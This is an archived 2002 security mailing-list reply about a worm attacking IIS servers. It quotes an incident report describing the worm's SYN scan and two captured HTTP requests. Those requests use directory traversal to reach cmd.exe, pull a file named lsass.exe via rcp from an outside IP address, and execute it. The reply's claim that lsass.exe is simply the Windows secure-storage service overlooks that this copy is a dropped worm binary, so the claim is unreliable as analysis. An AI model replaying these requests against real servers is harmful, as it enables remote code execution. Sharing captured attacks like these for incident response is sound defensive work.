Hello Christian, On Sat, 21 Sep 2002, at 20:17:48 [GMT +0200] (which was 19:17 in my TimeZone) you wrote: CM> hi, CM> since about a week I notice attempts to exploit vulnerable IIS installations CM> (they show up with snort's "WEB-IIS multiple decode attempt" signature) CM> that seems to try and load an "lsass.exe" file via rcp. CM> As a search of google and securityfocus turned up nothing, I'll throw in CM> what I gathered so far and ask if anybody can identify this: (it seems CM> the affected customer's systems weren't vulnerable, so I don't know what CM> the worm's further actions are). CM> The first part is a SYN scan for port 80, with the source port set to 80, CM> differing ACK numbers, but the same ISN. Interestingly, it iterates over CM> the 3rd IP address octet first, and the 4th later, probably to make the scan CM> on the single /24 slower and less noticeable (in the case I've seen, it CM> has some 30 seconds between packets to consecutive addresses). CM> Then it seems to go after the web servers, sending the following: CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+. HTTP/1.0.. CM> and CM> GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0 CM> I've been able to get hold of that lsass.exe binary (9728 bytes), but CM> I lack the skills to analyze it; I'll happily mail it to anybody who asks. CM> Yes, and the IP addresse doing the scanning + exploit attempts is different CM> from the one which provides lsass.exe; the scanning machine seems to be CM> a solaris 2.7 default install, the rcp-server seems to be solaris 2.8. CM> regards, CM> cm. lsass.exe is the Microsoft Secure Storage for 2000/NT and XP. It is responsable for managing secure storage in those enviroments. -- Best regards, Michael http://wwww.thompsonmike.co.uk/ PGP KeyID := 0x3CC985FA I just can't put it down. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:03:57 PDT